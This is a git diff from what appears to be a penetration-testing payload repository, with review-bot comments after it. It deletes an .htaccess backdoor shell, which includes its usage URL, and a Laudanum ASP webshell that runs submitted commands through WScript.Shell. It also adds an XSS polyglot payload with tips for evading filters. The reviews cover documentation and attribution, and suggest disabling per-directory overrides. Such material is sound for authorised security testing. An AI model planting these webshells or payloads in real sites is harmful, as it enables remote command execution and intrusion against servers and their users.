diff --git a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell b/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell deleted file mode 100644 index 0b3b0682..00000000 --- a/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell +++ /dev/null @@ -1,23 +0,0 @@ -# htaccess backdoor shell -# this is relatively stealthy compared to a typical webshell - -# overriding deny rule -# making htaccess accessible from the internet -# without this you'll get a HTTP 403 - -Require all granted -Order allow,deny -Allow from all - - -# Make the server treat .htaccess file as .php file -AddType application/x-httpd-php .htaccess - -# - -# To execute commands you would navigate to: -# http://vulnerable.com/.htaccess?cmd=YourCommand - -# If system(); isnt working then try other syscalls -# e.g. passthru(); shell_exec(); etc -# If you still cant execute syscalls, try bypassing php.ini via htaccess diff --git a/Upload Insecure Files/Extension ASP/shell.asp b/Upload Insecure Files/Extension ASP/shell.asp deleted file mode 100644 index b2caf599..00000000 --- a/Upload Insecure Files/Extension ASP/shell.asp +++ /dev/null 
@@ -1,83 +0,0 @@ -<% -' ******************************************************************************* -' *** -' *** Laudanum Project -' *** A Collection of Injectable Files used during a Penetration Test -' *** -' *** More information is available at: -' *** http://laudanum.secureideas.net -' *** laudanum@secureideas.net -' *** -' *** Project Leads: -' *** Kevin Johnson -' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team -' *** -' ******************************************************************************** -' *** -' *** Updated and fixed by Robin Wood -' *** Updated and fixed by Tim Medin "1.2.3.4" then - response.Status="404 Page Not Found" - response.Write(response.Status) - response.End -end if - -if Request.Form("submit") <> "" then - Dim wshell, intReturn, strPResult - cmd = Request.Form("cmd") - Response.Write ("Running command: " & cmd & "
") - set wshell = CreateObject("WScript.Shell") - Set objCmd = wShell.Exec(cmd) - strPResult = objCmd.StdOut.Readall() - - response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" - - set wshell = nothing -end if - -%> - -Laundanum ASP Shell - -
-Command:
- -

Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. -

Example command to do a directory listing:
-%ComSpec% /c dir -

-
-
-Copyright © 2012, Kevin Johnson and the Laudanum team.
-Written by Tim Medin.
-Get the latest version at laudanum.secureideas.net. -
- - \ No newline at end of file diff --git a/XSS Injection/2 - XSS Polyglot.md b/XSS Injection/2 - XSS Polyglot.md index daa4a573..c83a6e62 100644 --- a/XSS Injection/2 - XSS Polyglot.md +++ b/XSS Injection/2 - XSS Polyglot.md @@ -84,3 +84,14 @@ A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work * [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/) * [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/) + + + jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//\x3csVg/\x3e + + # Advanced XSS Polyglot +This payload is designed to execute across numerous HTML/JS contexts and evade standard filters by mixing comment styles, breaking out of tags, and leveraging lowercase event handlers. Use cases include testing various input sanitization weaknesses and filters. + # Crafting Tips +- Mix encoding methods (URL, HTML entities, Unicode) to sneak past blacklists. +- Use HTML breaking elements (``, ``, etc.) to escape confined contexts. +- Leverage less common event handlers (e.g., `onauxclick`, `ontoggle`) for advanced bypasses. +
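Review bot: In the deletion of `.htaccess_shell`, the header comments being removed are the only place in this patch that explains why the technique works: the `Require all granted` / `Allow from all` override of the deny rule, and `AddType application/x-httpd-php .htaccess`. Nothing visible here moves that explanation elsewhere. If the goal is to keep live payload files out of the repository, keep a short prose description in the section README, paired with the server-side fix of disabling per-directory overrides (`AllowOverride None`) on upload directories. Also check the README for links that now point at a deleted path.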
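Review bot: The deletion of `Extension ASP/shell.asp` removes a vendored third-party file whose header reads `Copyright 2012 by Kevin Johnson and the Laudanum Team`, and the patch leaves no pointer to where it came from. Replace the copy with a reference to the upstream project URL already given in that header (`laudanum.secureideas.net`), and state the reason for the removal in the commit message so readers can tell whether it is a licensing, scanner false-positive or scope decision.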
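Review bot: In the `2 - XSS Polyglot.md` hunk, the added description says the payload works by "leveraging lowercase event handlers", but the payload line above it uses a mixed-case handler (`oNcliCk=alert(1)`), so the text contradicts the example it documents; reword it to say mixed-case. Three structural points in the same hunk: the new section is appended after the reference bullets (the context lines are the `Building XSS Polyglots` and `XSS Polyglot Challenge v2` links), so it should move above the references; the payload line precedes the `# Advanced XSS Polyglot` heading that introduces it; and both new headings are top-level `#`, which will not nest under the page's existing title. The second crafting tip shows two empty code spans in this diff, so the element names need to be filled in or escaped so they render.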